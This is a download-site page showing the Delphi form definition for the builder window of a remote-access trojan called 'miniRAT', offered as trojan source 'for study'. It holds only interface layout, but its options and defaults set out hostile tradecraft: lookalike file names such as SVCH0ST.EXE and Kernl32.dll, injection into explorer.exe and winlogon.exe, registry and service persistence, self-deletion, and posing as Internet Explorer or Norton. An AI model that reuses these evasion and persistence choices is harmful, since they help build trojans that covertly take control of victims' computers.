⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 untservercreator.dfm

📁 木马源程序,供大家研究
💻 DFM
字号:
object Form7: TForm7
  Left = 36
  Top = 212
  BorderIcons = [biSystemMenu, biMinimize]
  BorderStyle = bsSingle
  Caption = 'miniRAT - Server Creator'
  ClientHeight = 304
  ClientWidth = 709
  Color = clBtnFace
  Font.Charset = DEFAULT_CHARSET
  Font.Color = clWindowText
  Font.Height = -11
  Font.Name = 'Tahoma'
  Font.Style = []
  OldCreateOrder = False
  PixelsPerInch = 96
  TextHeight = 13
  object Bevel2: TBevel
    Left = 8
    Top = 139
    Width = 313
    Height = 9
    Shape = bsTopLine
  end
  object Label3: TLabel
    Left = 8
    Top = 160
    Width = 97
    Height = 21
    AutoSize = False
    Caption = 'Server Port :'
    Layout = tlCenter
  end
  object Label4: TLabel
    Left = 8
    Top = 184
    Width = 97
    Height = 21
    AutoSize = False
    Caption = 'Server DNS :'
    Layout = tlCenter
  end
  object Label5: TLabel
    Left = 8
    Top = 208
    Width = 97
    Height = 21
    AutoSize = False
    Caption = 'Server Pass :'
    Layout = tlCenter
  end
  object Label6: TLabel
    Left = 8
    Top = 232
    Width = 97
    Height = 21
    AutoSize = False
    Caption = 'Registery Key :'
    Layout = tlCenter
  end
  object Label8: TLabel
    Left = 30
    Top = 40
    Width = 60
    Height = 12
    Caption = #23433#35013#36335#24452#65306
    Font.Charset = GB2312_CHARSET
    Font.Color = clWindowText
    Font.Height = -12
    Font.Name = #23435#20307
    Font.Style = []
    ParentFont = False
  end
  object Label9: TLabel
    Left = 30
    Top = 62
    Width = 60
    Height = 12
    Caption = #23433#35013#21517#31216#65306
    Font.Charset = GB2312_CHARSET
    Font.Color = clWindowText
    Font.Height = -12
    Font.Name = #23435#20307
    Font.Style = []
    ParentFont = False
  end
  object spSkinStdLabel1: TLabel
    Left = 34
    Top = 83
    Width = 54
    Height = 12
    Caption = 'DLL'#21517#31216#65306
    Font.Charset = GB2312_CHARSET
    Font.Color = clWindowText
    Font.Height = -12
    Font.Name = #23435#20307
    Font.Style = []
    ParentFont = False
  end
  object spSkinStdLabel2: TLabel
    Left = 8
    Top = 102
    Width = 84
    Height = 12
    Caption = #38544#34255#22312#36827#31243#20013#65306
    Font.Charset = GB2312_CHARSET
    Font.Color = clWindowText
    Font.Height = -12
    Font.Name = #23435#20307
    Font.Style = []
    ParentFont = False
  end
  object Label14: TLabel
    Left = 504
    Top = 166
    Width = 60
    Height = 12
    Caption = #26174#31034#21517#31216#65306
    Font.Charset = GB2312_CHARSET
    Font.Color = clMaroon
    Font.Height = -12
    Font.Name = #23435#20307
    Font.Style = []
    ParentFont = False
  end
  object Label15: TLabel
    Left = 504
    Top = 190
    Width = 60
    Height = 12
    Caption = #26381#21153#21517#31216#65306
    Font.Charset = GB2312_CHARSET
    Font.Color = clMaroon
    Font.Height = -12
    Font.Name = #23435#20307
    Font.Style = []
    ParentFont = False
  end
  object Label16: TLabel
    Left = 504
    Top = 215
    Width = 60
    Height = 12
    Caption = #25551#36848#20449#24687#65306
    Font.Charset = GB2312_CHARSET
    Font.Color = clMaroon
    Font.Height = -12
    Font.Name = #23435#20307
    Font.Style = []
    ParentFont = False
  end
  object Label7: TLabel
    Left = 319
    Top = 245
    Width = 60
    Height = 12
    Caption = #19978#32447#20998#32452#65306
    Font.Charset = GB2312_CHARSET
    Font.Color = clMaroon
    Font.Height = -12
    Font.Name = #23435#20307
    Font.Style = []
    ParentFont = False
  end
  object CheckBox1: TCheckBox
    Left = 200
    Top = 184
    Width = 121
    Height = 17
    Caption = 'Inject server into IE'
    TabOrder = 0
    Visible = False
  end
  object portEdit: TEdit
    Left = 104
    Top = 160
    Width = 89
    Height = 21
    TabOrder = 1
    Text = '80'
  end
  object Button1: TButton
    Left = 200
    Top = 160
    Width = 121
    Height = 21
    Caption = 'Randomize a Port'
    TabOrder = 2
    OnClick = Button1Click
  end
  object dnsEdit: TEdit
    Left = 104
    Top = 184
    Width = 89
    Height = 21
    TabOrder = 3
    Text = '192.168.5.2'
  end
  object passEdit: TEdit
    Left = 104
    Top = 208
    Width = 89
    Height = 21
    PasswordChar = '*'
    TabOrder = 4
    Text = 'sabason'
  end
  object Button2: TButton
    Left = 624
    Top = 264
    Width = 65
    Height = 17
    Caption = '&Build'
    TabOrder = 5
    OnClick = Button2Click
  end
  object ProgressBar1: TProgressBar
    Left = 8
    Top = 264
    Width = 593
    Height = 17
    Smooth = True
    TabOrder = 6
  end
  object Edit6: TEdit
    Left = 104
    Top = 232
    Width = 89
    Height = 21
    TabOrder = 7
    Text = 'Norton Anti-Virus'
  end
  object ComboBox1: TComboBox
    Left = 95
    Top = 36
    Width = 180
    Height = 20
    Font.Charset = GB2312_CHARSET
    Font.Color = clBlue
    Font.Height = -12
    Font.Name = #23435#20307
    Font.Style = []
    ItemHeight = 12
    ItemIndex = 1
    ParentFont = False
    TabOrder = 8
    Text = '<System>'
    Items.Strings = (
      '<Windows>'
      '<System>'
      '<Temp>')
  end
  object ComboBox2: TComboBox
    Left = 97
    Top = 59
    Width = 178
    Height = 20
    Font.Charset = GB2312_CHARSET
    Font.Color = clBlue
    Font.Height = -12
    Font.Name = #23435#20307
    Font.Style = []
    ItemHeight = 12
    ItemIndex = 0
    ParentFont = False
    TabOrder = 9
    Text = 'RAVMOND.EXE'
    Items.Strings = (
      'RAVMOND.EXE'
      'Explore.EXE'
      'Winlogo.EXE'
      'Windows.EXE'
      '2005022.exe'
      'hmy.bat'
      'hmyServer.com'
      'SVCH0ST.EXE'
      'SP00LSV.EXE'
      'RAVMOND.EXE')
  end
  object ComboBoxDll: TComboBox
    Left = 97
    Top = 81
    Width = 178
    Height = 20
    Font.Charset = GB2312_CHARSET
    Font.Color = clBlue
    Font.Height = -12
    Font.Name = #23435#20307
    Font.Style = []
    ItemHeight = 12
    ItemIndex = 0
    ParentFont = False
    TabOrder = 10
    Text = 'Kernl32.dll'
    Items.Strings = (
      'Kernl32.dll'
      'samlibs.dll'
      'scriptpws.dll')
  end
  object ComboBoxHost: TComboBox
    Left = 96
    Top = 101
    Width = 178
    Height = 19
    Font.Charset = ANSI_CHARSET
    Font.Color = clBlue
    Font.Height = -11
    Font.Name = #23435#20307
    Font.Style = []
    ItemHeight = 11
    ItemIndex = 0
    ParentFont = False
    TabOrder = 11
    Text = 'Iexplore.exe'
    Items.Strings = (
      'Iexplore.exe'
      'explorer.exe'
      'winlogon.exe'
      'svchost.exe'
      'GreenBrowser')
  end
  object CheckBox2: TCheckBox
    Left = 22
    Top = 120
    Width = 247
    Height = 18
    Caption = #33258#21160#21024#38500#23433#35013#25991#20214
    Checked = True
    State = cbChecked
    TabOrder = 12
  end
  object CheckBox8: TCheckBox
    Left = 334
    Top = 144
    Width = 231
    Height = 17
    Caption = 'Win9x'#19979#20889#20837#27880#20876#34920#21551#21160#39033
    Checked = True
    State = cbChecked
    TabOrder = 13
  end
  object RadioBox1: TCheckBox
    Left = 534
    Top = 140
    Width = 176
    Height = 17
    Caption = 'Win2000'#19979#23433#35013#25104#26381#21153#21551#21160
    Checked = True
    State = cbChecked
    TabOrder = 14
  end
  object ServerView: TEdit
    Left = 563
    Top = 162
    Width = 128
    Height = 20
    Hint = #36825#37324#20449#24687#20250#20986#29616#22312#33258#21160#19978#32447#21015#34920#30340#22791#27880#26639#37324'!'#27492#26639#21487#20197#19981#22635'!'
    Font.Charset = GB2312_CHARSET
    Font.Color = clWindowText
    Font.Height = -12
    Font.Name = #23435#20307
    Font.Style = []
    ImeName = #26368#24378#20116#31508#36755#20837#27861
    MaxLength = 30
    ParentFont = False
    ParentShowHint = False
    ShowHint = False
    TabOrder = 15
    Text = 'Microsoft Internet Explorer'
  end
  object ServerName: TEdit
    Left = 563
    Top = 186
    Width = 128
    Height = 20
    Hint = #36825#37324#20449#24687#20250#20986#29616#22312#33258#21160#19978#32447#21015#34920#30340#22791#27880#26639#37324'!'#27492#26639#21487#20197#19981#22635'!'
    Font.Charset = GB2312_CHARSET
    Font.Color = clWindowText
    Font.Height = -12
    Font.Name = #23435#20307
    Font.Style = []
    ImeName = #26368#24378#20116#31508#36755#20837#27861
    MaxLength = 30
    ParentFont = False
    ParentShowHint = False
    ShowHint = False
    TabOrder = 16
    Text = 'MicIE'
  end
  object ServerText: TEdit
    Left = 563
    Top = 211
    Width = 128
    Height = 20
    Hint = #36825#37324#20449#24687#20250#20986#29616#22312#33258#21160#19978#32447#21015#34920#30340#22791#27880#26639#37324'!'#27492#26639#21487#20197#19981#22635'!'
    Font.Charset = GB2312_CHARSET
    Font.Color = clWindowText
    Font.Height = -12
    Font.Name = #23435#20307
    Font.Style = []
    ImeName = #26368#24378#20116#31508#36755#20837#27861
    MaxLength = 30
    ParentFont = False
    ParentShowHint = False
    ShowHint = False
    TabOrder = 17
    Text = 'Microsoft Internet Explorer'
  end
  object CheckBox9: TCheckBox
    Left = 328
    Top = 168
    Width = 177
    Height = 17
    Hint = #24120#35268#33258#21160#21551#21160#23481#26131#21457#29616
    Caption = #22312#38190#20540'(Local Machine)'#27880#20876
    Checked = True
    State = cbChecked
    TabOrder = 18
  end
  object CheckBox10: TCheckBox
    Left = 328
    Top = 192
    Width = 164
    Height = 17
    Hint = #21482#35201#21551#21160'explorer'#27880#21551#21160
    Caption = #27880#20876#25104'shell'
    TabOrder = 19
  end
  object CheckBox11: TCheckBox
    Left = 328
    Top = 216
    Width = 160
    Height = 17
    Hint = #21482#26377#19968#20010#29992#25143#21551#21160#26102#25165#21152#36733
    Caption = #22312#38190#20540'Current User'#20013#27880#20876#23376
    TabOrder = 20
  end
  object RadioGroup1: TRadioGroup
    Left = 24
    Top = 0
    Width = 361
    Height = 33
    Columns = 2
    Font.Charset = GB2312_CHARSET
    Font.Color = clBtnText
    Font.Height = -12
    Font.Name = #23435#20307
    Font.Style = []
    ItemIndex = 1
    Items.Strings = (
      #20027#21160#36830#25509
      #33258#21160#36830#25509)
    ParentFont = False
    TabOrder = 21
  end
  object GrEdit3: TEdit
    Left = 393
    Top = 241
    Width = 213
    Height = 20
    Font.Charset = GB2312_CHARSET
    Font.Color = clMaroon
    Font.Height = -12
    Font.Name = #23435#20307
    Font.Style = []
    ImeName = #26368#24378#20116#31508#36755#20837#27861
    MaxLength = 30
    ParentFont = False
    ParentShowHint = False
    ShowHint = False
    TabOrder = 22
    Text = #33258#21160#19978#32447#20027#26426
  end
  object dlgSave1: TSaveDialog
    FileName = 'server.exe'
    Left = 344
    Top = 56
  end
end

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -